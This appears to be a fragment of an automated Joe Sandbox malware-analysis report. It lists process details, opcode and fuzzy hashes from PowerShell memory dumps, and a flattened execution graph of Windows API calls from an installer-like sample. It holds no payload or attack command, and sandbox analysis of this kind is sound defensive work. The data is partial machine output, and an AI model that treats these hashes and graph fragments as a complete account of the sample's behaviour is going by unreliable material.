                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                                                            Start time:01:11:10
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2242971489.00007FFD3458D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3458D000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd3458d000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: b1ce520ee313e95b7d24ff090e02dde04cd336f24725ef9452a6653dfc93a679
                                                                                                                                                                                                                                                                              • Instruction ID: 6bad92a334095329c66902485817cf6fedec9835cbbe3c39e2a1bb26f6bf7485
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1ce520ee313e95b7d24ff090e02dde04cd336f24725ef9452a6653dfc93a679
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1041463090DBC44FE7978B2998559523FF0EF53320B1505DFD088CB0A3DA29A846C793
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: e05ffdb0ba3602e69285a39627396aaae22558f5b0ecdf7df7e02b1047858f27
                                                                                                                                                                                                                                                                              • Instruction ID: 05b23d918b2aa3fe7ee6fe5baa88d9bb11ded2fea56328806fa37c728017be8b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e05ffdb0ba3602e69285a39627396aaae22558f5b0ecdf7df7e02b1047858f27
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC21D2A2B0EA578FE7A5DA1C88E11743BC1EF46314B9941BAD69DC71A2CD5CFC109381
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: f63123942239674242b448def11fc578944c8880ba3d9bdb998eb9c3406758d0
                                                                                                                                                                                                                                                                              • Instruction ID: 87da0e0f7cec0fed795d7caaa167eb728e50f4df12119df5f6dee905747261b1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f63123942239674242b448def11fc578944c8880ba3d9bdb998eb9c3406758d0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BE06D74408A8C8FCB06EF28C4586957FA0EB25205F01419BE449C7021DB719558CBC2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 628d7496391a5b5ff842d7a5c8eeb15101e0282e762e223332c2d6b59ba76397
                                                                                                                                                                                                                                                                              • Instruction ID: a25a8a4175fda12e9967d3db4dde24d2dc317356ca085e7fbd8fd2e312efc7e5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 628d7496391a5b5ff842d7a5c8eeb15101e0282e762e223332c2d6b59ba76397
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F41123B2B0D6898FEBA5EA5844A01B87BD1EF4A320F5480BEC54DD71A3DD29A805C350
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 187d416ec05d95e45a389b62a473a0dcbeb7f7ec8002cde201fb36c26828123d
                                                                                                                                                                                                                                                                              • Instruction ID: 785fdd2e5691d04200528276bcb11bb6b27f926af9c8028956f8d746936c423d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 187d416ec05d95e45a389b62a473a0dcbeb7f7ec8002cde201fb36c26828123d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01D272B0DA858FEBA5DB1C88A04647BD1EF0632078540FAD19CCB0A3CE28FC54C781
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 9cf9833af275c33f26c79d4083025a3755e8a03b622ac4861918292aaaa80b63
                                                                                                                                                                                                                                                                              • Instruction ID: 43977ef1b7dfd0ee32df5e7b93cfb2b8d27daadd335b339e6e886490eacb1644
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf9833af275c33f26c79d4083025a3755e8a03b622ac4861918292aaaa80b63
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB01B172B0D6858FE769EB1C98E54B47BD0EF4632075540BAD19CD71A3CD29BC44D381
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction ID: 24aef6e58671a62f14222a864d5608cc4645e75a5eb2213a00036e05fa3ae6e9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401677121CB0C4FD784EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
Memory Dump Source
• Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 4fa9c067c914e44c798ea8e80b281233f16507eae43bab1d64d23f8eeafd419c
                                                                                                                                                                                                                                                                              • Instruction ID: e258044ed441e5a4b822f6f023d0f86273dd1158724e6fb69f865bb4b9660ce0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fa9c067c914e44c798ea8e80b281233f16507eae43bab1d64d23f8eeafd419c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B71C662A0E6A24FD752DA6CDCFA0EA7B94DF5322D70D41BBC284CF097ED1C14069296
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: e8da394c80ece7ed7c2165155158606664f23069ac140887574b4f6b91e3d29c
                                                                                                                                                                                                                                                                              • Instruction ID: 0536bfb715c1092bfd3e68bfabdd385233e44f4289bbb67637278dd30f5875a0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8da394c80ece7ed7c2165155158606664f23069ac140887574b4f6b91e3d29c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C24198B261EBE64FE6668E2D58F64E57BD0DF1322470900BEC395CB493DE096407A242
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 2c7679c250ed372fdfa6e1370379b596d1803207ee670fbeb7960362856b894e
                                                                                                                                                                                                                                                                              • Instruction ID: debcdc8fc143792852b6a89bde14b4c3b04cfc646435fc287bb44144864bc434
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c7679c250ed372fdfa6e1370379b596d1803207ee670fbeb7960362856b894e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32318893A0EAE30FE7534A2D9CB61D67F94EF533A4B0950B7C688CB083DD1D14069356
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2492850621.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 2ab40a1c2b59f2abb518fc7f09916990591a38f57a4a7445d8dd869428672b68
                                                                                                                                                                                                                                                                              • Instruction ID: c5f1c1b511386eb6fd7b603409d6a34f80db3968b4c3271791b1fda87e84b525
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab40a1c2b59f2abb518fc7f09916990591a38f57a4a7445d8dd869428672b68
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8912562B0DACA4FFB9996289CB61B57BD0EF97310B8440BAD24DC31D3DD59B80297C1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2492850621.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 38919e76880bb0778d82a9446de60bdde3bf30a50ba83808999e09b8cb4a9291
                                                                                                                                                                                                                                                                              • Instruction ID: 752418378f504a506d5bef63147b70fdc8029d5f1c0e708e520f52f24d04649f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38919e76880bb0778d82a9446de60bdde3bf30a50ba83808999e09b8cb4a9291
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18110AA2B0DA868BF758965858F51B976C1EF46314B84407ED34DC31D3DD1DF8009681
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2492241743.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction ID: 24aef6e58671a62f14222a864d5608cc4645e75a5eb2213a00036e05fa3ae6e9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401677121CB0C4FD784EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45

Execution Graph

Execution Coverage:18.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:16.6%
Total number of Nodes:1481
Total number of Limit Nodes:28
4582->4584 4587 4024f1 4583->4587 4585 40145c 18 API calls 4584->4585 4586 402413 4585->4586 4588 402429 LoadLibraryExW 4586->4588 4589 40241b GetModuleHandleW 4586->4589 4590 4024ce 4588->4590 4591 40243e 4588->4591 4589->4588 4589->4591 4593 404f9e 25 API calls 4590->4593 4603 406391 GlobalAlloc WideCharToMultiByte 4591->4603 4593->4581 4594 402449 4595 40248c 4594->4595 4596 40244f 4594->4596 4597 404f9e 25 API calls 4595->4597 4598 401435 25 API calls 4596->4598 4601 40245f 4596->4601 4599 402496 4597->4599 4598->4601 4600 4062cf 11 API calls 4599->4600 4600->4601 4601->4587 4602 4024c0 FreeLibrary 4601->4602 4602->4587 4604 4063c9 GlobalFree 4603->4604 4605 4063bc GetProcAddress 4603->4605 4604->4594 4605->4604 3416 402175 3426 401446 3416->3426 3418 40217c 3419 401446 18 API calls 3418->3419 3420 402186 3419->3420 3421 402197 3420->3421 3424 4062cf 11 API calls 3420->3424 3422 4021aa EnableWindow 3421->3422 3423 40219f ShowWindow 3421->3423 3425 4030e3 3422->3425 3423->3425 3424->3421 3427 406831 18 API calls 3426->3427 3428 401455 3427->3428 3428->3418 4606 4048f8 4607 404906 4606->4607 4608 40491d 4606->4608 4609 40490c 4607->4609 4624 404986 4607->4624 4610 40492b IsWindowVisible 4608->4610 4616 404942 4608->4616 4611 403ddb SendMessageW 4609->4611 4613 404938 4610->4613 4610->4624 4614 404916 4611->4614 4612 40498c CallWindowProcW 4612->4614 4625 40487a SendMessageW 4613->4625 4616->4612 4630 406035 lstrcpynW 4616->4630 4618 404971 4631 405f7d wsprintfW 4618->4631 4620 404978 4621 40141d 80 API calls 4620->4621 4622 40497f 4621->4622 4632 406035 lstrcpynW 4622->4632 4624->4612 4626 4048d7 SendMessageW 4625->4626 4627 40489d GetMessagePos ScreenToClient SendMessageW 4625->4627 4629 4048cf 4626->4629 4628 4048d4 4627->4628 4627->4629 4628->4626 4629->4616 4630->4618 4631->4620 4632->4624 3721 4050f9 3722 4052c1 3721->3722 3723 40511a GetDlgItem GetDlgItem GetDlgItem 3721->3723 3724 4052f2 3722->3724 3725 4052ca GetDlgItem CreateThread CloseHandle 3722->3725 
3770 403dc4 SendMessageW 3723->3770 3727 405320 3724->3727 3729 405342 3724->3729 3730 40530c ShowWindow ShowWindow 3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 
4050c1 3778->3780 3779->3778 3780->3775 4633 4020f9 GetDC GetDeviceCaps 4634 401446 18 API calls 4633->4634 4635 402116 MulDiv 4634->4635 4636 401446 18 API calls 4635->4636 4637 40212c 4636->4637 4638 406831 18 API calls 4637->4638 4639 402165 CreateFontIndirectW 4638->4639 4640 4030dc 4639->4640 4641 4030e3 4640->4641 4643 405f7d wsprintfW 4640->4643 4643->4641 4644 4024fb 4645 40145c 18 API calls 4644->4645 4646 402502 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40250c 4647->4648 4649 40145c 18 API calls 4648->4649 4650 402515 4649->4650 4651 40145c 18 API calls 4650->4651 4652 40251f 4651->4652 4653 40145c 18 API calls 4652->4653 4654 402529 4653->4654 4655 40253d 4654->4655 4656 40145c 18 API calls 4654->4656 4657 4062cf 11 API calls 4655->4657 4656->4655 4658 40256a CoCreateInstance 4657->4658 4659 40258c 4658->4659 4660 4026fc 4662 402708 4660->4662 4663 401ee4 4660->4663 4661 406831 18 API calls 4661->4663 4663->4660 4663->4661 3807 4019fd 3808 40145c 18 API calls 3807->3808 3809 401a04 3808->3809 3812 405eab 3809->3812 3813 405eb8 GetTickCount GetTempFileNameW 3812->3813 3814 401a0b 3813->3814 3815 405eee 3813->3815 3815->3813 3815->3814 4664 4022fd 4665 40145c 18 API calls 4664->4665 4666 402304 GetFileVersionInfoSizeW 4665->4666 4667 4030e3 4666->4667 4668 40232b GlobalAlloc 4666->4668 4668->4667 4669 40233f GetFileVersionInfoW 4668->4669 4670 402350 VerQueryValueW 4669->4670 4671 402381 GlobalFree 4669->4671 4670->4671 4672 402369 4670->4672 4671->4667 4677 405f7d wsprintfW 4672->4677 4675 402375 4678 405f7d wsprintfW 4675->4678 4677->4675 4678->4671 4679 402afd 4680 40145c 18 API calls 4679->4680 4681 402b04 4680->4681 4686 405e7c GetFileAttributesW CreateFileW 4681->4686 4683 402b10 4684 4030e3 4683->4684 4687 405f7d wsprintfW 4683->4687 4686->4683 4687->4684 4688 4029ff 4689 401553 19 API calls 4688->4689 4690 402a09 4689->4690 4691 40145c 18 API calls 4690->4691 4692 402a12 4691->4692 4693 402a1f RegQueryValueExW 4692->4693 4697 401a13 
4692->4697 4694 402a45 4693->4694 4695 402a3f 4693->4695 4696 4029e4 RegCloseKey 4694->4696 4694->4697 4695->4694 4699 405f7d wsprintfW 4695->4699 4696->4697 4699->4694 4700 401000 4701 401037 BeginPaint GetClientRect 4700->4701 4702 40100c DefWindowProcW 4700->4702 4704 4010fc 4701->4704 4705 401182 4702->4705 4706 401073 CreateBrushIndirect FillRect DeleteObject 4704->4706 4707 401105 4704->4707 4706->4704 4708 401170 EndPaint 4707->4708 4709 40110b CreateFontIndirectW 4707->4709 4708->4705 4709->4708 4710 40111b 6 API calls 4709->4710 4710->4708 4711 401f80 4712 401446 18 API calls 4711->4712 4713 401f88 4712->4713 4714 401446 18 API calls 4713->4714 4715 401f93 4714->4715 4716 401fa3 4715->4716 4717 40145c 18 API calls 4715->4717 4718 401fb3 4716->4718 4719 40145c 18 API calls 4716->4719 4717->4716 4720 402006 4718->4720 4721 401fbc 4718->4721 4719->4718 4722 40145c 18 API calls 4720->4722 4723 401446 18 API calls 4721->4723 4724 40200d 4722->4724 4725 401fc4 4723->4725 4727 40145c 18 API calls 4724->4727 4726 401446 18 API calls 4725->4726 4728 401fce 4726->4728 4729 402016 FindWindowExW 4727->4729 4730 401ff6 SendMessageW 4728->4730 4731 401fd8 SendMessageTimeoutW 4728->4731 4733 402036 4729->4733 4730->4733 4731->4733 4732 4030e3 4733->4732 4735 405f7d wsprintfW 4733->4735 4735->4732 4736 402880 4737 402884 4736->4737 4738 40145c 18 API calls 4737->4738 4739 4028a7 4738->4739 4740 40145c 18 API calls 4739->4740 4741 4028b1 4740->4741 4742 4028ba RegCreateKeyExW 4741->4742 4743 4028e8 4742->4743 4748 4029ef 4742->4748 4744 402934 4743->4744 4746 40145c 18 API calls 4743->4746 4745 402963 4744->4745 4747 401446 18 API calls 4744->4747 4749 4029ae RegSetValueExW 4745->4749 4752 40337f 33 API calls 4745->4752 4750 4028fc lstrlenW 4746->4750 4751 402947 4747->4751 4755 4029c6 RegCloseKey 4749->4755 4756 4029cb 4749->4756 4753 402918 4750->4753 4754 40292a 4750->4754 4758 4062cf 11 API calls 4751->4758 4759 40297b 4752->4759 4760 4062cf 11 API calls 4753->4760 
4761 4062cf 11 API calls 4754->4761 4755->4748 4757 4062cf 11 API calls 4756->4757 4757->4755 4758->4745 4767 406250 4759->4767 4764 402922 4760->4764 4761->4744 4764->4749 4766 4062cf 11 API calls 4766->4764 4768 406273 4767->4768 4769 4062b6 4768->4769 4770 406288 wsprintfW 4768->4770 4771 402991 4769->4771 4772 4062bf lstrcatW 4769->4772 4770->4769 4770->4770 4771->4766 4772->4771 4773 403d02 4774 403d0d 4773->4774 4775 403d11 4774->4775 4776 403d14 GlobalAlloc 4774->4776 4776->4775 4777 402082 4778 401446 18 API calls 4777->4778 4779 402093 SetWindowLongW 4778->4779 4780 4030e3 4779->4780 4781 402a84 4782 401553 19 API calls 4781->4782 4783 402a8e 4782->4783 4784 401446 18 API calls 4783->4784 4785 402a98 4784->4785 4786 401a13 4785->4786 4787 402ab2 RegEnumKeyW 4785->4787 4788 402abe RegEnumValueW 4785->4788 4789 402a7e 4787->4789 4788->4786 4788->4789 4789->4786 4790 4029e4 RegCloseKey 4789->4790 4790->4786 4791 402c8a 4792 402ca2 4791->4792 4793 402c8f 4791->4793 4795 40145c 18 API calls 4792->4795 4794 401446 18 API calls 4793->4794 4797 402c97 4794->4797 4796 402ca9 lstrlenW 4795->4796 4796->4797 4798 401a13 4797->4798 4799 402ccb WriteFile 4797->4799 4799->4798 4800 401d8e 4801 40145c 18 API calls 4800->4801 4802 401d95 ExpandEnvironmentStringsW 4801->4802 4803 401da8 4802->4803 4804 401db9 4802->4804 4803->4804 4805 401dad lstrcmpW 4803->4805 4805->4804 4806 401e0f 4807 401446 18 API calls 4806->4807 4808 401e17 4807->4808 4809 401446 18 API calls 4808->4809 4810 401e21 4809->4810 4811 4030e3 4810->4811 4813 405f7d wsprintfW 4810->4813 4813->4811 4814 40438f 4815 4043c8 4814->4815 4816 40439f 4814->4816 4817 403df6 8 API calls 4815->4817 4818 403d6b 19 API calls 4816->4818 4820 4043d4 4817->4820 4819 4043ac SetDlgItemTextW 4818->4819 4819->4815 4821 403f90 4822 403fa0 4821->4822 4823 403fbc 4821->4823 4832 405cb0 GetDlgItemTextW 4822->4832 4825 403fc2 SHGetPathFromIDListW 4823->4825 4826 403fef 4823->4826 4828 403fd2 4825->4828 4831 403fd9 SendMessageW 
